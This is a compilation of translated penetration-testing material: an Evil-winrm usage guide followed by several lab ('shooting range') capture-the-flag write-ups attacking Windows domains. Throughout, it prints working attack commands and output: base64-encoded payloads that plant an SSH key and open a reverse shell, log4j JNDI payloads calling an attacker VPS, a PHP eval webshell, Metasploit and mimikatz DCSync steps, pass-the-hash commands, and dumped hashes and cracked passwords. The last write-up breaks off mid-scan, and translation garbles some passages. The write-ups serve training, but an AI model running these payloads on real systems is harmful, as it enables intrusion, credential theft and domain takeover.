Evil-winrm This function means that after obtaining a remote session, the log of the execution command is saved to our local system. When we are working on projects, we need to attack credentials in order to perform subsequent reports and output. All logs can be saved to our host system using the -l parameter and saved to the /root/evil-winrm-logs directory by default. In the following example, we can use the ipconfig command at the same time and save the command output information to the host system. evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l You can verify whether the command log output is stored successfully by checking the saved log content. You can see that the log information output from our above command has been stored. Disable remote full path function By default, the tool comes with the remote full path feature, but if we want to disable the remote path full path feature, we can use the -N parameter in the command. It depends on whether the individual likes to turn the path full feature on or off, but if you are satisfied with the automatic full-path feature, you can feel free to use its default feature. evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -N Disable color interface Whenever we use evil-winrm to create any remote session, a beautiful colored command line interface is generated. Nevertheless, if we want to disable the color interface feature, we can also use the -n parameter to disable the feature when creating a session. evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -N Run the executable file This feature is designed to solve real-time problems and difficulties we encounter during evaluation while conducting a PowerShell session that we cannot put on the command line. In this case, we want to be able to run the exe executable in the evil-winrm session. Suppose we have an executable file to run in the target system. The Hackplayers team once again designed the tool and added an additional feature to run all executables in an evil-winrm PowerShell session. Similarly, we can use the -e parameter to execute exe executable binary. In the following example, where the WinPEAS.exe executable is stored in the local computer /opt/privsc directory and runs it using the additional function (Invoke-Binary command in the evil-winrm menu). This feature allows us to execute any exe binary that runs in the command line shell. evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -e /opt/privsc Bypass-4MSI menu Invoke-Binary /opt/privsc/winPEASx64.exe Once we have set the executable path, we can use any executable that we want to run in the target system. In the following example, we call WinPEASx64.exe and run it into the target system using evil-winrm. Use Evil-winrm for service query Sometimes the post-penetration test tool cannot detect the service name running in the target system. In this case, we can use evil-winrm to find the service name running in the target system. To do this, we can go to the menu again and use the service function. It will list all services running the program host. File transfer using Evil-winrm There is no doubt that evil-winrm has done its best to make our use as simple as possible. We always need to transfer files from the attack machine to the remote machine to perform its command operations. And the evil-winrm tool provides a very practical feature, especially when we are facing outbound traffic rules set in the target system and when we use evil-winrm with the proxy. In the following example, we upload the notes.txt file in the /root directory to the target system. The file is downloaded from the target system to the attacker's machine. Similarly, we can use the following command to download: download notes.txt /root/raj/notes.txt Using Evil-winrm from Docker This tool can also be installed in in docker. If we are installing into docker into evil-winrm, then we can also call it from docker. It will run like it is in the main system. To do this, follow the docker syntax and the evil-winrm command to call it from docker. docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987' Login with Evil-winrm key Evil-winrm also allows us to use public and private keys to establish remote sessions, use parameters with -k and private keys, and parameters with -c and public keys. In addition, we can also add the -S parameter to enable SSL to enable our connection to encrypt and secure. evil-winrm -i 10.129.227.105 -c certificate.pem -k priv-key.pem -S

0x01 – Info Tag: Tomcat, NTLM, WebClient, Coerce Authentication, noPac 0x02 – Recon Target external ip 47.92.146.66 Nmap results Focus on port 8009 (ajp) means tomcat (corresponding to tomcat tag of the shooting range) directory scan, the 404 page is displayed as tomcat 9.0.30 Playing with Ghost cat Test with this project https://github.com/00theway/Ghostcat-CNVD-2020-10487 Read /web-inf/web.xml url-pattern The result is saved as a dictionary FFuf Follow uploadservlet Upload temp.txt Return file address ./upload/7dbbdee357b4472f5aad6b8ce83980dd/20221206093440839.txt Replace ./upload to /upload, successfully read the uploaded file python3 ajpShooter.py http://47.92.146.66:8080 8009 /upload/7dbbdee357b4472f5aad6b8ce83980dd/20221206093440839.txt read 0x03 – GhostCat command execution Get ready shell.txt % java.io.InputStream in=Runtime.getRuntime().exec("bash -c {echo,ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDL3NKaDY4Uk5hWktLakNQaE40WUxpSnJ4eDR3N3JtbDBGcFRmMTNYNHVKZlpFZm4yU25scE9rdXQ0OE1LdURHOEtDcXczRW0zNU9odXdUa2p3ZEkvRGhGN3ZSeTB0T2xtWDE5NmJHcXpndE5pM1YzUHExc3NC MzV5Ui85SHJ6ZjVEdHdqS2NKdkphV0RuZzU2UWhHZjlnR21vdUZVQWV2QjdsUWl3a01FNWNxTzVsQTRwUm5KVEh2RU1OQUkxQkc3MTBEeWNKT28rNGh1TGNNVjZhdUs3UXdKTWdnN0oyU2U5TEpGZWk2R2g0amJUSGRhdmNBVjV6VVJZeFI4QVNXSmNqY29tM2dMUEE1UWNxSzNzSERRVmswUHllaT R3cEJwWWlFUGlHcHlQR2Y1T3ErUU0xQmJyR0gvTlRBYnZWa3dDZnBkRURWdVBNNWhHOFY4c09HTjIxczlWazFjMVBXaEh2WDZ1ejhRaDRNdUdnQlRYSHlZb3duTjg3OTExVDVGR0VjVzlWeUh1cm9FSVJtdE9sY3dBYmRMc0k0NVhOS1o0aWoxdERLNTRTMmpXWXhJTjhSL1ZuUnV2RVVoTVpGOUla bDM3UW5EQnBFR25LTXFjTVE4cHVUZUJBMngvSURHMFR6MWxjVGk5WHp5WjVheTd4dTJwZStidXhWT1BSQ2M9IiA+PiAvcm9vdC8uc3NoL2F1dGhvcmml6ZWRfa2V5cwoKY2htb2QgNjAwIC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCg==}|{base64,-d}|{bash,-i}").getInputStream(); int a=-1; byte[] b=new byte[2048]; out.print("pre"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("/pre");% Upload shell.txt Execute uploaded code SSH – flag01 0x04 – Portal Ubuntu: 172.22.11.76 SSH Nothing, just go through to open the agent to scan 445 for the agent, and get the information of three hosts 172.22.11.45 XR-Desktop.xiaorang.lab 172.22.11.6 xiaorang-dc.xiaorang.lab 172.22.11.26 XR-LCM3AE8B.xiaorang.lab Pay attention to 172.22.11.45 – windows7 – MS17 MS17 completed in one go Basic operations Credential List Administrator 4430c690b4c1ab3f4fe4f8ac0410de4a – (local credentials) John 03cae082068e8d55ea307b75581a8859 – (local credentials) XR-DESKTOP$ 3aa5c26b39a226ab2517d9c57ef07e3e – (Domain Credentials) yangmei 25e42ef4cc0ab6a8ff9e3edbbda91841 – xrihGHgoNZQ (plain text) – (domain credentials) I have tried the combination blasting, there is nothing, I just skipped the demonstration here and went directly to the domain penetration link Flag2 Add domain user yangmei to the local administrator of the machine Determine the domain control IP to 172.22.11.6 – xiaorang-dc Bloodhound collection 0x05 – Domain penetration link, entrance XR-Desktop: 172.22.11.45 Let's go through this quickly (summary in one sentence: you can't directly take down the domain control) The password/hashes combination obtained using the username combination collected by Bloodhound was blasted. No other new users were found to have MAQ=0. The computer cannot be added. The current LDAP does not have TLS, and the computer cannot be added remotely. There are two methods for the add computer of impacket. Samr and ldaps. samr is restricted by MAQ=0, and cannot add computers; ldaps is restricted by no TLS + MAQ=0. Domain control exists nopac. Current user yangmei uses nopac and does not kill ACL domain control exists nopac for computer container in the domain. Current user yangmei does not have WriteDacl permission on the current windows machine xr-desktop, which means that DFscoerce and petitpotam cannot be modified in SamAccountName domain, but CVE-2019-1040 does not exist, so DFscoerce is abandoned and petitpotam is given priority to using petitpotamNoPac exploit:Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user (github.com)Petitpotam Scan No ADCS + Petitpotam + ntlm relay play Attack chain: Use petitpotam to trigger the target of the vulnerability and enable the webclient service. Use petitpotam to trigger the target to access our http relay service. The target will use webclient to carry ntlm authentication to access our relay, and relay its authentication to ldap, obtain the identity of the machine account, and modify its own msDS-AllowedToActOnBehalfOfOtherIdentity attribute as the machine account, allowing our malicious machine account to simulate and authenticate access to the target machine (RBCD) to meet the conditions. The target machine needs to enable the webclient service. WebClient scan, and it is confirmed that it can only be won. 172.22.11.26 (XR-LCM3AE8B) Relay Attack Preface: The relay play in actual combat only needs to stop 80 occupancy services, and enable port forwarding (portfwd, CS has added rportfwd_local in subsequent versions, and forward directly to the client local). This demonstration is similar to the actual combat play. It does not choose to throw impacket to the entrance ubuntu. This operation relay attack environment configures : port forwarding + proxy We currently need to forward the server's 80 to the local client's 80 Note: Since SSH's reverse port forwarding only listens to 127.0.0.1, we need some tricks at this time. As shown in the figure, even if the reverse port forwards port 79 specifies to listen to all (-R \*:79:127.0.0.1:80), port 79 is still bound to 127.0.0.1 (the socks5 proxy is also opened in the figure) Add an extra socat to forward the traffic 0.0.0.0:80 to 127.0.0.1:79, and then forward it back to the local 80 on the client side, making the 80 listen in disguise at 0.0.0.0 Test, the traffic coming in from 172.22.11.76:80 is directly forwarded to our local area Open ntlmrelayx locally Note: As mentioned earlier, there is no ldaps, so you cannot use addcomputer and then use the ip to connect to the dc after using the ip to set RBCDsudo proxychains4 -q -f proxychains.conf ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access Use Petitpotam to trigger XR-LCM3AE8B Certified to 172.22.11.76 (ubuntu)proxychains4 -q -f ~/HTB/Spoofing/proxychains.conf python3 PetitPotam.py -u yangmei -p 'xrihGHgoNZQ' -d xiaorang.lab ubuntu@80/pwn.txt XR-LCM3AE8B It can be seen that the RBCD attack has been completed, and the next step is to apply for the bank notes of XR-LCM3AE8B directly. Apply for XR-LCM3AE8B CIFS notes 0x06 – Domain penetration link – NoPAC, entrance XR-LCM3AE8B: 172.22.11.26 psexecflag03 in C:\users\administrator\flag\flag03.txt (No screenshot here) smbclient.py pass mimikatz obtains new credentials zhanghui 1232126b24cdf8c9bd2f788a9d7c7ed1 Only zhanghui can succeed. zhanghui can create objects in the MA_Admin group. MA_Admin group can create objects for computers, but I didn't see AdFind.exe in bloodhound -b 'CN=Computers,DC=xiaorang,DC=lab' nTSecurityDescriptor -sddl+++ Bloodhound cannot be seen, the main reason is that CreateChild was not collected into json and returned to nopac, plus create-child parameter 0x07 – Domain penetration link – xiaorang-dc Log in to DCflag04 using the cifs tickets applied for by nopac. C:\users\administrator\flag\flag04.txt (No screenshot here) Domain tube (skip using mimikatz) administrator 0fadb57f5ec71437d1b03eea2cda70b9 ![[ 0x08 – Playing around Try to solve the problem that Bloodhound.py cannot collect CreateChild Bloodhound/enumeration/acls.py has actually defined variables, just call them Come to line 170, we add it, find CreateChild and add the data Run bloodhound.py again, observe the results of containers, and find that there is already relevant data. RID 1132=MA_Admin group Bloodhound diagram, but the data is still messy Original link: https://www.anquanke.com/post/id/285771

0x1 Info The shooting range address: https://yunjing.icunqiu.com/ranking/summary?id=BzMFNFpvUDU The shooting range environment from the web to the intranet to the domain is complete, and the idea of setting questions is very good. If you are interested, you can go and play. 0x2 Recon Target external IP39.98.34.149Nmap results Follow the http service on port 80, directory blast (omitted) find /admin Use weak password to log in to the background, go to the template page, edit header.html, add php in a sentence \Username : admin, Password: 123456 Command execution 0x03 Entry point: 172.22.4.36 shell Quickly go through: The entry machine has no special things and cannot raise the permissions to root (not need to raise the permissions to root). Stapbpf suid failed to use Find diff suid flag01diff --line-format=%L /dev/null /home/flag/flag01.txt flag01 There is a prompt for username WIN19\Adrian hanging agent scanning 445 Get the information of three machines 172.22.4.19 fileserver.xiaorang.lab 172.22.4.7 DC01.xiaorang.lab 172.22.4.45 win19.xiaorang.lab Use Flag01 prompt username + rockyou.txt to explode, and create valid credentials (prompt password expires) win19\Adrian babygirl1xfreerdp Remote login to win19 and then change password 0x04 Pwing WIN19 - 172.22.4.45 Preface: The current machine has no domain credentials except the machine account, so you need to raise the authority to obtain the machine account at the system. There are prompts on the desktop Follow this column. The current user Adrian has full control over the registry Elevated rights msfvenom generates service horse, execute sam.bat sam.bat Modify the registry and enable the service, and then the desktop will get sam, security, system Get Administrator + Machine Account Credentials Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab: $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:917234367460f3f2817aa4439f97e636 flag02 Collection of domain information using machine account 0x05 DC takeover - 172.22.4.7 Analysis Bloodhound, and found that WIN19 + DC01 is both non-constrained delegation Login to enter WIN19 using Administrator, deploy rubeus Use DFSCoerce to force trigger back to win19 and get the TGT of DC01 Base64's tgt decoding is DC01.kirbi DCSync Get domain management credentials psexec - flag04 0x06 Fileserver takeover - 172.22.4.19 psexec - flag03 0x07 Outro Thanks to Master Alphabug for the tip (0x03 -0x04), my brother has finished the entry point, I just followed in and thanked Master Jiu for his cooperation original link: https://www.freebuf.com/articles/web/352151.html

0x00 Intro OSCP penetration style, leaving tools like C2 and MSF is not difficult 0x01 Info Tag: JDBC, Exchange, NTLM, Coerce Authentication, DCSync 0x02 Recon Target external IP39.98.179.149Nmap results directly follow the 8000 port. I have already missed 80 before, and I have nothing to pass directly. Huaxia ERP, there are many loopholes, the entry point has been stuck for a long time, and I saw JDBC later, and I directly searched for my brother's articles after Google searches. Fastjson's high-version magic tricks - Bmth (bmth666.cn)(http://www.bmth666.cn/bmth_blog/2022/10/19/Fastjson%E9%AB%98%E7%89%88%E6%9C%AC%E7%9A%84%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/#%E8%93%9D%E5%B8%BD%E6%9D%AF2022%E5%86%B3%E8%B5%9B-%E8%B5%8C%E6%80%AA)Construction payload Configure MySQL_Fake_Server Unauthorized + MySQL Connector JDBC deserialization combination punch Direct RCE RCE after direct acquisition Flag01 0x03 Entry point: 172.22.3.12 SMB scans the intranet host, sees the Exchange keyword (EXC01), and tries to access 172.22.3.9. Beat the Exchange Proxylogon directly to obtain system permissions flag02 (short subsequent credential collection) 0x04 Entry point: 172.22.3.9 Fast forward 1: Hash of the exchange machine account has been collected 2: At the same time, a domain account credential was collected: Zhangtong has collected the exchange machine account hash through the above operation. The exchange machine account has writtenacl permissions for the entire domain-object in the domain. Then we directly use dacledit.py to add dcsync permissions to Zhangtong (in fact, you can also add dcsync to yourself) Dcsync to get the hashes of the domain manager and user lumia to enter 172.22.3.2 to get flag04 0x05 Final: 172.22.3.26 There is a secret.zip in the Lumia user folder above 172.22.3.26 Direct PTH Exchange exports all emails and attachments in Lumia mailbox item-0.eml, prompting that the password is mobile phone number There is a csv in the exported attachment, which is full of mobile phone number Regular operation, convert to a hash in pkzip format and runs the dictionary, and runs out the password flag03 0x06 Outro After Exchange, the author's original intention is to let us use NTLM Relay to complete the DCSync upgrade, obtain Exchange SYSTEM permissions, and trigger the webdav to relay to ldap. If you are interested, you can read my previous article Spoofing 2. Lumia user logs in to exchange. The author also wants you to change the password of Lumia user, but I am lazy. Direct PTH original link: https://www.anquanke.com/post/id/286967

After turning on the target machine, there is a login interface with ThinkPHP icon. Just test it directly exists 5.0.23 RCE , let’s check the environment of PHP-7.4.3, take a look at the disable_functions pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_weexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_ha ndler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare The transmission is immediately, the ant sword connection is www-data permission, so you have to find a way to increase the authority and enter /root I found some articles under the official account I followed before. The Web Security Tools Library is quite complete,《Linux提权备忘录》 Try cat /etc/sudoers being told Permission denied, change to sudo -l to view This website can provide reference for the command elevation can be implemented using mysql, sudo mysql -e '! cat /root/flag/flag01.txt' get the first part of flag ifconfig check IP Pass fscan up and scan down section C,/fscan_amd64 -h 172.22.1.1/24, the result is in the current result.txt 172.22.1.18:3306 open 172.22.1.2:88 open 172.22.1.21:445 open 172.22.1.18:445 open 172.22.1.2:445 open 172.22.1.21:139 open 172.22.1.18:139 open 172.22.1.2:139 open 172.22.1.21:135 open 172.22.1.18:135 open 172.22.1.2:135 open 172.22.1.18:80 open 172.22.1.15:80 open 172.22.1.15:22 open [*] 172.22.1.2 (Windows Server 2016 Datacenter 14393) [+] 172.22.1.21 MS17-010 (Windows 7 Professional 7601 Service Pack 1) [+] NetInfo: [*]172.22.1.21 [-]XIAORANG-WIN7 [-]172.22.1.21 [+] NetInfo: [*]172.22.1.18 [-]XIAORANG-OA01 [-]172.22.1.18 [+] NetInfo: [*]172.22.1.2 [-]DC01 [-]172.22.1.2 [*] 172.22.1.2 [+]DC XIAORANG\DC01 Windows Server 2016 Datacenter 14393 [*] WebTitle:http://172.22.1.15 code:200 len:5578 title3:Bootstrap Material Admin [*] 172.22.1.18 XIAORANG\XIAORANG-OA01 Windows Server 2012 R2 Datacenter 9600 [*] 172.22.1.21 __MSBROWSE__\XIAORANG-WIN7 Windows 7 Professional 7601 Service Pack 1 [*] WebTitle:http://172.22.1.18 code:302 len:0 title:None Jump url: http://172.22.1.18?m=login [*] WebTitle:http://172.22.1.18?m=login code:200 len:4012 title:Sign call collaborative office system [+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1 .15 doesn’t need to be seen,21 is a Win7 with the existence of Eternal Blue,18 is a system that calls OA, and .2 is a domain control Forwarding with NPS+Proxifier proxy, first look at .18 Then there are two ways to do it. The first is to target a file upload vulnerability in the call OA. You can refer to the article of Master Y4tacker. Just use the weak password admin/admin123 to log in and just type exp. The second method is to use /phpmyadmin to log in directly root/root, and then write to webshell using logs. The first step is to execute show variables like 'general%'; check whether the log is enabled and the stored log location Second step set global general_log=ON; turn on log The third step set global general_log_file to set the log saving location Finally select '?php eval($_POST[cmd]);';Write and then connect the ant sword, flag is under C:/Users/Administrators/flag Next,21 is a Win7 machine. You can call MS17-010. After trying it, you can't leave the network. You can use forward monitoring. First hang up the proxy, proxychains msfconsole to go socks5 traffic, and then use exploit/windows/smb/ms17_010_eternalblue=set payload windows/x64/meterpreter/bind_tcp_uuid=set RHOSTS 172.22.1.21=exploit After obtaining a positive meterpreter shell, the next step is to use DCSync You can refer to this article for the introduction of DCSync. The biggest feature is that it can obtain data on the domain control without logging in to the domain control. directly load kiwi under MSF, and then kiwi_cmd 'lsadump:dcsync /domain:xiaorang.lab /all /csv' exit export Hash for all users in the domain is scanned out before .2 and open the 445 port. Use smb hashing to pass it directly with the crackmapexec that comes with kali. proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x '$cmd', the last part of the flag is under /Users/Administrators/flag Original link: http://119.45.47.125/index.php/2022/11/24/yunjing-4/

Instructions Time is a shooting range environment with medium difficulty. Completing this challenge can help players understand the technical methods of proxy forwarding, intranet scanning, information collection, privilege escalation and horizontal movement in intranet penetration, strengthen their understanding of the core authentication mechanism of the domain environment, and master some interesting technical points in the domain environment penetration. There are 4 flags in the shooting range, distributed in different target machines. Technology Neo4j, Kerberos, Privilege Elevation, Domain Penetration First flag Outdoor IP Information Collection start infoscan (icmp) Target '39.98.236.25' is alive icmp alive hosts len is: 1 39.98.236.25:22 open 39.98.236.25:1337 open 39.98.236.25:7474 open 39.98.236.25:7473 open 39.98.236.25:7687 open 39.98.236.25:35555 open alive ports len is: 6 start vulscan Completed 0/6 [-] webtitle http://39.98.236.25:7473 Get 'http://39.98.236.25:7473': net/http: HTTP/1.x transport connection broken: malformed HTTP response '\x15\x03\x03\x00\x02\x02P' [*] WebTitle:http://39.98.236.25:7474 code:200 len:145 title:None [*] WebTitle:http://39.98.236.25:7687 code:400 len:0 title:None [*] WebTitle:https://39.98.236.25:7687 code:400 len:0 title:None Completed 6/6 scan end neo4j Unauthorized RCE Neo4j is an open source graph database management system. In Neo4j 3.4.18 and before, if the Neo4j Shell interface is enabled, an attacker will be able to call any method as an unauthorized identity through the RMI protocol, where the setSessionVariable method has a deserialization vulnerability. Because this vulnerability is not RMI deserialization, it is not affected by the Java version. In Neo4j 3.5 and later versions, Neo4j Shell was replaced by Cyber Shell. https://github.com/zwjjustdoit/CVE-2021-34371.jar java -jar rhino_gadget.jar rmi://39.98.236.25:1337 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3R.NC81NTU1IDA+JjE=}|{base64,-d}|{bash,-i}' Bounce shell Find flag Get the first flag The second flag Intranet penetration Uploading agent and fscan start infoscan Completed 0/0 listen ip4:icmp 0.0.0.0: socket: operation not allowed trying RunIcmp2 The current user permissions unable to send icmp packets start ping (icmp) Target 172.22.6.12 is alive (icmp) Target 172.22.6.25 is alive (icmp) Target 172.22.6.38 is alive (icmp) Target 172.22.6.36 is alive [*] Icmp alive hosts len is: 4 172.22.6.25:445 open 172.22.6.12:445 open 172.22.6.25:139 open 172.22.6.12:139 open 172.22.6.25:135 open 172.22.6.12:135 open 172.22.6.38:80 open 172.22.6.36:22 open 172.22.6.38:22 open 172.22.6.36:7687 open 172.22.6.12:88 open [*] alive ports len is: 11 start vulscan [+] NetInfo: [*]172.22.6.25 [-]WIN2019 [-]172.22.6.25 [+] NetInfo: [*]172.22.6.12 [-]DC-PROGAME [-]172.22.6.12 [*] 172.22.6.12 [+]DC XIAORANG\DC-PROGAME Windows Server 2016 Datacenter 14393 [*] 172.22.6.25 XIAORANG\WIN2019 [*] 172.22.6.12 (Windows Server 2016 Datacenter 14393) [*] WebTitle:http://172.22.6.38 code:200 len:1531 title: backend login [*] WebTitle:https://172.22.6.36:7687 code:400 len:50 title:None Completed 11/11 sql injection Visit http://172.22.6.38, which is a login page that crawls the data packet POST /index.php HTTP/1.1 Host: 172.22.6.38 Content-Length: 30 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://172.22.6.38 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://172.22.6.38/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8 Connection: close username=adminpassword=1111111 Test injection using sqlmap (process omitted) sqlmap -r 1.txt --dump -T oa_f1Agggg -D oa_db -batch Get the second flag There are also oa_admin tables and oa_users tables, which collect 500 user names in the users table into dictionary username.txt ‍‍Third flag Domain User Enumeration In kerberos' AS-REQ authentication, when the user in the cname value does not exist, the package prompts KDC_ERR_C_PRINCIPAL_UNKNOWN, so when we do not have domain credentials, we can enumerate the domain users from outside the domain through Kerberos pre-auth https://github.com/ropnop/kerbrute proxychains ./kerbrute_linux_amd64 userenum --dc 172.22.6.12 -d xiaorang.lab username.txt -t 10kali's proxy execution has not been successful and no results appear. The file is passed to the entry machine and the results are only obtained after remote execution There are 74 users in total, and they are made into dictionary user.txt AS-REPRoasting For domain users, if the option Do not require Kerberos preauthentication is set (Kerberos pre-identification is not required), then send an AS-REQ request to the 88 port of the domain controller, recombining the received AS-REP content, and can be spliced into the format of "Kerberos 5 AS-REP etype 23" (18200). Next, you can use hashcat or john to crack it, and finally obtain the user's plaintext password. Find an account that has not been pre-authenticated proxychains python3 GetNPUsers.py -dc-ip 172.22.6.12 -usersfile user.txt xiaorang.lab/ Get two accounts [email protected], [email protected] [email protected]@XIAORANG.LAB:b6c410706b5e96c693b2fc61ee1064c3$2dc9fbee784e7997333f30c6bc4298ab5752ba94be7022e807af41 8c11359fd92597e253752f4e61d2d18a83f19b5c9df4761e485853a3d879bcf7a270d6f846683b811a80dda3809528190d7f058a24996aff13094ff9b32c0e2698f6d639b4d 237a06d13c309ce7ab428656b79e582609240b01fb5cd47c91573f80f846dc483a113a86977486cecce78c03860050a81ee19921d3500f36ff39fa77edd9d5614cf4b9087d3 e42caef68313d1bb0c4f6bc5392943557b584521b305f61e418eb0f6eb3bf339404892da55134cb4bf828ac318fe00d68d1778b7c82caf03b65f1938e54ed3fa51b63cdb2994 [email protected]@XIAORANG.LAB:971802b84ce99050ad3c5f49d11fd0b7$6c1be075c3cf2a7695529de2ebbf39c5ec7e5326c9d891dac2107b23 9892f76befe52c860e4e1e2ff6537a5765a6bcb6b8baca792d60765ac0bbe1b3c5e59f3ec51b7426636a437d5df12130eb68d9b17ef431455415671c7331a17ce823e28cc41167 7bed341d3fceefc3451b8b232ea6039661625a5c793e30c4d149b2ed9d2926e9d825b3828744ebce69e47746994c9a749ceeb76c560a1840bc74d2b9f301bb5b870c6805915163 54460dab2238e7827900ed80320dd3a6f46874b1bc8a3a68aea7bd11d0683ec94103f59d9511691090928e98d0d8978f511e71fd9db0067fa0d450c120f3726918d7 uses hashcat to decrypt hashcat -m 18200 --force -a 0 '[email protected]@XIAORANG.LAB:b6c410706b5e96c693b2fc61ee1064c3$2dc9fbee784e7997333f30c6bc4298ab5752ba94be7022e807af4 18c11359fd92597e253752f4e61d2d18a83f19b5c9df4761e485853a3d879bcf7a270d6f846683b811a80dda3809528190d7f058a24996aff13094ff9b32c0e2698f6d639b4d 237a06d13c309ce7ab428656b79e582609240b01fb5cd47c91573f80f846dc483a113a86977486cecce78c03860050a81ee19921d3500f36ff39fa77edd9d5614cf4b9087d3e 42caef68313d1bb0c4f6bc5392943557b584521b305f61e418eb0f6eb3bf339404892da55134cb4bf828ac318fe00d68d1778b7c82caf03b65f1938e54ed3fa51b63cdb2994' rockyou.txt hashcat -m 18200 --force -a 0 '[email protected]@XIAORANG.LAB:971802b84ce99050ad3c5f49d11fd0b7$6c1be075c3cf2a7695529de2ebbf39c5ec7e5326c9d891dac2107 b239892f76befe52c860e4e1e2ff6537a5765a6bcb6b8baca792d60765ac0bbe1b3c5e59f3ec51b7426636a437d5df12130eb68d9b17ef431455415671c7331a17ce823e28cc 411677bed341d3fceefc3451b8b232ea6039661625a5c793e30c4d149b2ed9d2926e9d825b3828744ebce69e47746994c9a749ceeb76c560a1840bc74d2b9f301bb5b870c680 591516354460dab2238e7827900ed80320dd3a6f46874b1bc8a3a68aea7bd11d0683ec94103f59d9511691090928e98d0d8978f511e71fd9db0067fa0d450c120f3726918d7' rockyou.txt This way I got two accounts and passwords [email protected]/strawberry [email protected]/hellokitty Domain Environment Analysis Log in with domain account 172.22.6.25, upload SharpHound for data collection SharpHound.exe -c all export file contains multiple jsons, which save various relationships in the domain Upload data to BloodHound, click Analysis, and find the shortest path to the domain administrator Find Shortest Paths to Domain Admins The path from thick to thin is the permissions or relationships that xx has on xx, so the path is as follows From BloodHound, we can know that the next step we need to do the user yuxuan windows automatic login HasSession: When a user is having a session with a computer, the credentials will be retained in memory, indicating that yuxuan has logged in to WIN2019 Many users are used to setting up computers to log in automatically, and they can use MSF to grab the username and password for automatically logging in. Become a positive shell msfvenom -p windows/meterpreter/bind_tcp -f exe -o shy.exe then upload to target machine win2019 (172.22.6.25) to run Run msf using proxy and connect use exploit/multi/handler set payload windows/meterpreter/bind_tcp set rhost 172.22.6.25 run Crawl the password for automatic login meterpreter run windows/gather/credentials/windows_autologin I didn't catch the password here and couldn't continue. There is no way to keep watching other people's wp continue. Get yuxuan/Yuxuan7QbrgZ3L by grabbing the password, ok, now we can use yuxuan to log in to WIN2019 Hash pass HasSIDHistory: The user's SID history. After the user migrates in the domain, the ticket also contains the SID of the group where the previous domain is located. Although the user does not belong to the previous domain, he still has permissions to the previous domain. Use yuxuan to capture the hash of Administrator mimikatz.exe 'lsadump:dcsync /domain:xiaorang.lab /user:Administrator' exit smb horizontal WIN2019, get the third flag proxychains crackmapexec smb 172.22.6.25 -u administrator -H04d93ffd6f5f6e4490e0de23f240a5e9 -d xiaorang.lab -x 'type Users\Administrator\flag\flag03.txt' Original link: https://zhuanlan.zhihu.com/p/582525371

Instructions Certify is a shooting range environment with medium difficulty. Completing this challenge can help players understand the technical methods of proxy forwarding, intranet scanning, information collection, privilege escalation and horizontal movement in intranet penetration, strengthen their understanding of the core authentication mechanism of the domain environment, and master some interesting technical points in the domain environment penetration. There are 4 flags in the shooting range, distributed in different target machines. Technology Solr, AD CS, SMB, Kerberos, Domain Penetration First flag log4j RCE Scan the external network IP Found that Solr has a log4j component, test whether there is rce GET /solr/admin/cores?action=${jndi:ldap://1p9bvr.dnslog.cn} HTTP/1.1 Host: 47.92.113.194:8983 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://47.92.113.194:8983/solr/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8 Connection: close dnslog echo JNDI rebound shell, open on VPS # Loading malicious classes java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 47.103.xxx.xxx #Enable monitoring nc -lvvp 5555 payload ${jndi:ldap://47.103.xxx.xxx:1389/Basic/ReverseShell/47.103.xxx.xxx/5555}Send a request GET /solr/admin/cores?action=${jndi:ldap://47.103.xxx.xxx:1389/Basic/ReverseShell/47.103.xxx.xxx/5555}wt=json HTTP/1.1 Host: 47.92.113.194:8983 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://47.92.113.194:8983/solr/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8 Connection: close successfully rebounds shell sudo escalation of rights sudo -l sudo grc --help sudo grc --pty whoami Find flag sudo grc --pty find/-name flag* output flag sudo grc --pty cat /root/flag/flag01.txt The second flag Intranet penetration Agent on the export machine and scan the intranet. I won't go into details (setting up http service, wget download npc and fscan) 172.22.9.13:445 open 172.22.9.26:445 open 172.22.9.47:445 open 172.22.9.7:445 open 172.22.9.26:139 open 172.22.9.47:139 